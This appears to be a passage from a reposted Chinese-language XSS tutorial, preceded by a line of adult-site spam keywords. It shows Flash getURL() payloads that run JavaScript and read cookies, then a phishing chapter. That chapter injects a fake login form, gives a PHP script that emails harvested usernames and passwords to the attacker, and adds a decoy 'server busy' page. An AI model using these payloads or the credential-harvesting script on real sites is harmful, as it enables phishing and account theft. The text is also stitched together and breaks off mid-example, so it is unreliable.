国产精品香蕉在线观看网,亚洲欧美精品综合在线观看,亚洲不卡av一区二区无码不卡,亚洲日本精品国产第一区二区

　　Flash是用于復(fù)雜的動(dòng)畫，仿真和游戲開發(fā)等。非常有趣的是Flash的getURL()動(dòng)作，它可以使我們的頁(yè)面重定向到函數(shù)指定的頁(yè)面，改函數(shù)的語(yǔ)法如下：

　　getURL(url:String, [window: String,[method:String]])

　　例如：getURL(”http://victime.com/login.php?logout=true”,”_self“);

　　該函數(shù)的各個(gè)參數(shù)為：

　　url: 重定向的網(wǎng)站url

　　window: 設(shè)置重定向的窗口打開方式 (_self, _blank…)

　　method: 請(qǐng)求頁(yè)面的方式 GET 或者 POST

　　下面運(yùn)用actionscrip來彈出警告窗口的方法：

　　getURL(”javascript:alert(’XSS’”);

　　在2002年的時(shí)候，曾經(jīng)公布這個(gè)函數(shù)的危險(xiǎn)性，例如可以用下面的方式來獲取瀏覽者的cookie:

　　getURL(”javascript:alert(document.cookie)”)

　　在2005年12月的時(shí)候，對(duì)getURL()進(jìn)行了改進(jìn)，改進(jìn)了在flash文件簽名中輸入XSS語(yǔ)句從而導(dǎo)致永久性XSS攻擊的漏洞。官方采用這種更新是為了防止再次爆發(fā)中傳播Samy Xss，Samy可以隱藏在flash中******cookies。

　　但是這樣的更新就解決了XSS嗎？不，目前還沒有完全解決flash的XSS問題，下面的例子來說明，在flash文件中輸入：

　　GetURL(”http://www.victime.com/page.php?var=GIF89aGIF = GIF89a

　　JPG = à JFIF

　　BMP = BMF

　　為了安全不能僅僅依靠getimagesize()函數(shù)來檢查圖片。

　　第八章、利用XSS漏洞進(jìn)行釣魚

　　你了解釣魚(phishing)的目的嗎？你了解XSS的目的嗎？

　　在我們的例子中，將有必要找一個(gè)存在XSS漏洞的網(wǎng)站，并在一個(gè)form表單里注入一個(gè)URL重定向的代碼：

　　Enter your login and password, thank:

　　Login:

　　Password:

　　你已經(jīng)猜到這個(gè)腳本將冒充一個(gè)form表單來發(fā)送用戶名及密碼給代你，下面的php文件是用來發(fā)送email的(mail.php):

　　$login = $HTTP_GET_VARS["login"];

　　$password = $HTTP_GET_VARS["password"];

　　mail(”[email protected]“, “Cookie stealed ! - thx xyli :)”, $password , $login );

　　>

　　Error-Server too much busy

　　用戶提交后看到這個(gè)頁(yè)面會(huì)認(rèn)為網(wǎng)頁(yè)等待與超載是正常的，而不會(huì)有所懷疑什么，我相信你已經(jīng)明白這個(gè)道理了？